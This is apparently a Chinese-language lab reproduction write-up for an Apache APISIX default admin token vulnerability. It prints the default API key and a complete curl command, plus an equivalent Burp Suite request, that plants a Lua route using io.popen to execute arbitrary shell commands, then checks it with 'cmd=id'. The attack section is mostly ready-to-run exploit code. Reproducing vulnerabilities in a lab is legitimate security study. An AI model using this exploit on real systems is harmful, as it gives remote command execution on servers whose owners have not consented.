环境启动后,访问 http://your-ip:9080 应能看到默认的 404 页面,确认环境运行正常
该漏洞利用默认 Token 添加恶意路由
通过默认管理员 Token(edd1c9f034335f136f87ad84b625c8f1)向管理员接口发送 POST 请求,添加包含恶意 Lua 脚本的路由
方法1:
点击查看代码
curl -X POST "http://192.168.75.132:9080/apisix/admin/routes" -H "X-API-KEY: edd1c9f034335f136f87ad84b625c8f1" -H "Content-Type: application/json" -d '{"uri":"/attack","script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require(\"os\")\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, \"r\"))\n local s = assert(f:read(\"*a\"))\n ngx.say(s)\n f:close() \n end \nreturn _M","upstream":{"type":"roundrobin","nodes":{"example.com:80":1}}}'
执行恶意脚本通过script参数注入,其中io.popen(args.cmd, 'r')用于执行cmd参数传入的系统命令,并通过ngx.say(s)返回执行结果
执行任意命令验证漏洞
curl "http://192.168.75.132:9080/attack?cmd=id"
方法2:
请出bp(burpsuite)发送POST请求
进入proxy模块开启拦截
浏览器中任意访问URL,bp会拦截请求
在 Burp 的「Intercept」面板中,将请求方法从 GET 改为 POST,并修改请求路径为目标接口;
POST /apisix/admin/routes HTTP/1.1
在请求行下方添加必要的请求头,包括漏洞利用所需的 X-API-KEY 和 Content-Type;
点击查看代码
Host: 192.168.75.132:9080
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: */*
点击查看代码
{"uri": "/attack","script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}
}
点击forword发送请求后切换到「HTTP history」标签页
找到刚发送的请求,查看响应内容。若返回包含 {"action":"create"} 的 JSON,说明 POST 请求成功
该漏洞复现成功!!!